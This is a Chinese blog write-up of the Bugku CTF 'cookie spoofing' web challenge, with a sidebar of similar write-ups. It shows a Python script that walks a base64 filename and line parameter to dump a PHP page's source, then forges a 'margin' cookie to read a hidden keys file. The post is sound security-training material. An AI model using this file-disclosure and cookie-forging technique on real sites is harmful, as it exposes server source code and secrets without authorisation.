BUGKU-cockie欺骗

最新推荐文章于 2021-02-03 21:44:30 发布
最新推荐文章于 2021-02-03 21:44:30 发布
阅读量581 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/90141980
版权

我们打开网页查看,一堆乱码。我们仔细分析url可以出我们给服务器传了两个参数,我们将发filename之后的参数进行解密得到key.txt,我们访问一下key.txt,发现也是一堆编码。我们试着访问一下index.php,将index.php进行加密。访问得到:

在这里插入图片描述我们发现更改line的值我们可以看到不同的内容,但是我们一个一个的查有点麻烦。所以我们写一个脚本跑出来。对于文件有多少行我们可以用二分法进行。

#!/usr/bin/python
#!coding=utf-8

import requests
s=requests.session()
for i in range(0,20):
        r1=s.get("http://123.206.87.240:8002/web11/index.php",params={"line":str(i),"filename":"aW5kZXgucGhw"})
        print(r1.text)

在这里插入图片描述分析代码;

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");    //判断filename是否存在,如果存在就是本值,否则为空即空格。

$line=isset($_GET['line'])?intval($_GET['line']):0;   //判断line这个变量是否存在 intval转化为书值型

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); //如果file=空,那么页面跳转到后面的url上。并执行下面的代码。

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);                            //定义数组:数组中有两个元素。

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){   /如果存在cookie,并且Cookie的值为margin。

$file_list[2]='keys.php';      //如果存在以上的值,那么数组的第三个元素为“keys.php”

}

 

if(in_array($file, $file_list)){     //判读数组file_list在file中是否存在。 file这个变量是指第一行我们通过filename传来的文件名。

$fa = file($file);  //file函数的作用是读取file这个变量存放的文件的内容,并把他读入到数组中。数组就叫fa。

echo $fa[$line];      //最后输出line变量(数组中键的名字即数组对应元素的内容)

}

我们同代码中可以看到第三个文件,所以我们访问第三个文件(先进行base64编码):

在这里插入图片描述
最终的到flag。

暮秋初九
关注
专栏目录
BugKucookies 欺骗
wssmiss的博客
03-25 1521
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
Linux X-Window Error: Can‘t open display: :0
zggzcgy的专栏
10-24 1万+
问题过程描述 许多经常部署Oracle数据的管理员经常需要对数据库软件进行部署,但大多数都是通过远程部署的方式进行部署,使用远程部署有两种方式,一种是通过脚本部署,另一种就是通过图形化进行部署。 但linux使用图形化并不像windows那么一帆风顺,这也是由于对linux图形的不了解造成。一般连接过程是通常是用putty或xshell等ssh远程客户端连接到服务器,本地电脑运行一个支持X Server协议应用,利用ssh加密隧道将图形界面传送到本地电脑X Server上使用图形化界面,这样就可以看到服务器
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
Bugku——cookie欺骗
csu_vc的博客
10-28 8416
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
bugku cookies欺骗
qq_51439282的博客
02-03 272
打开题目可以看到一堆乱码毫无规律 之后发现网址中有一串base64编码a2V5cy50eHQ= 解码得到:keys.txt 再尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码) line应该是行数那么就从0开始试发现每增加一个数字都有所不同 这样一个一个试太麻烦,直接用脚本将源码跑出来 import requests a = 30 for i in range(a): url = "http://114.67.246.176:16736/i
webdirver.add_cockie
最新发布
04-03
()This method is used to add a cookie to the current session. The cookie should be specified as a dictionary with the following keys: - 'name': The name of the cookie. - 'value': The value of the ...
Angularjs之如何在跨域请求中传输Cookie的方法
10-18
在现代Web开发中,AngularJS作为一个强大的前端框架,经常需要与不同源的API进行交互,这就涉及到了跨域请求的问题。然而,当涉及到Cookie时,跨域请求可能会遇到一些挑战,因为默认情况下,浏览器出于安全考虑,...
Android登录注册(客户端)_cookieMonster
03-24
这是一个Android Studio工程,包含登录和注册两个Activity,分别使用PostService类指定连接的Java Web服务器的Servlet,HttpClient类指定连接的服务器地址。详情可参考我的博客文章...
浅显易懂的cookie的使用(设置和获取cookie缓存)
01-20
Cookie是Web开发中的一种重要机制,它用于在客户端和服务器之间存储和传递少量的数据。...在本文中,我们将深入探讨Cookie的定义、使用方法,以及如何通过JavaScript进行设置和获取。 1. **Cookie的定义** ...
Scock5Client
02-21
Scock5Client登陆代码
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
bugkucookies欺骗
Seaern的博客
08-02 633
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 313
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
Bugku:web cookies欺骗
qq_26961571的博客
07-10 284
​ 打开这道题。 发现全是一堆乱码!!马上打开源代码进行查看。 也是一堆乱码!!!一点头绪没有。 直到发现了网页的链接有问题,比普通的网页多出来了line,filename??? 哦吼,所以这里有猫腻。 用base64解码之后发现filename=keys.txt 尝试使用index.php看看有没有源代码,但是依然要用base64加密index.php才可以打开。 打开之后发现一片空白,后来在line=后面添加数字之后就出现了源...
bugku web cookies欺骗
weixin_43928140的博客
05-20 730
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
cookies欺骗bugku-web)
小白的劝退之路
04-30 309
BugkuCTF cookies欺骗
3tu6b0rn的博客
05-14 615
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....
bugku cookies欺骗-wp
freerats的博客
07-14 220
打开容器,发现一大串字符串,发现他们是循环的,研究了一会什么都没发现(事实的确是字符串本身没有什么意义) 上面有俩参数,解码一下是keys.txt,前面的line改0页面不变,改1发现页面改变。 把key.txt改成index.php,发现该前面的参数为1出现代码,改2有不同的代码,结合参数名猜测是通过参数控制显示不同的行,后面还有很多,写个脚本跑一下 import requests url='http://123.206.87.240:8002/web11/index.php?line=2&amp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值